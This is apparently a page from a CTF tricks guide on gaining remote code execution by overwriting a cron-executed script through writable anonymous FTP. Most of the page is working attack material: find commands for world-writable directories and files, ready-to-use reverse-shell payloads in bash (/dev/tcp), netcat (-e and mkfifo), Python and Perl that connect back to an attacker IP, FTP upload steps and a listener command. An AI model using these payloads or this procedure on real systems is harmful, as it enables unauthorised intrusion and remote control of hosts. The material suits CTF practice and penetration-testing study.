> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/vulnerability-exploitation/initial-access-vulnerability-exploitation-ftp.md).

# Ftp

## Cron Script Overwrite via Writable Anonymous FTP

Exploiting a cron job script located in a directory writable via anonymous FTP allows for Remote Code Execution. If anonymous FTP is enabled and a directory containing a script executed by cron (e.g., `/scripts/clean.sh`) has world-writable permissions (`drwxrwxrwx`), you can overwrite the script with a malicious payload. You can often identify world-writable directories using commands like:

```bash
find / -perm /o+w -type d 2>/dev/null
```

or

```bash
find / -type d -perm -o+w 2>/dev/null
```

and world-writable files with:

```bash
find / -writable -type f 2>/dev/null
```

or

```bash
find / -type f -perm -o+w 2>/dev/null
```

A more robust search for world-writable directories, excluding common system paths, is:

```bash
find / -path /proc -prune -o -path /sys -prune -o -path /run -prune -o -path /dev -prune -o -path /var/lib/docker -prune -o -type d -perm /o+w -ls 2>/dev/null
```

Once a writable directory containing a cron-executed script is found, you can upload a malicious payload.

A common payload is a reverse shell. The bash `/dev/tcp` method is frequently used:

```bash
#!/bin/bash
bash -i >& /dev/tcp/@your_machine_ip/1234 0>&1
```

Replace `@your_machine_ip` and `1234` with your attacker machine's IP and desired port. Other types of reverse shell payloads can also be used depending on what is available on the target system. For example, a Netcat reverse shell using the `-e` option (if available):

```bash
nc @your_machine_ip 1234 -e /bin/sh
```

Or a Netcat reverse shell using a named pipe (`mkfifo`):

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc @your_machine_ip 1234 >/tmp/f
```

If Python is installed, a Python reverse shell can be effective:

```python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("@your_machine_ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
```

Similarly, if Perl is available:

```perl
use Socket;$i="@your_machine_ip";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
```

Again, replace `@your_machine_ip` and `1234` with your attacker machine's IP and desired port.

Upload this payload using the FTP `put` command after connecting anonymously:

```
ftp target_ip
anonymous
# password (or leave blank)
put clean.sh /scripts/clean.sh
```

Set up a netcat listener (`nc -lvnp 1234`) on your machine *before* uploading. When the cron job executes the modified script (often every minute), you will receive a shell.
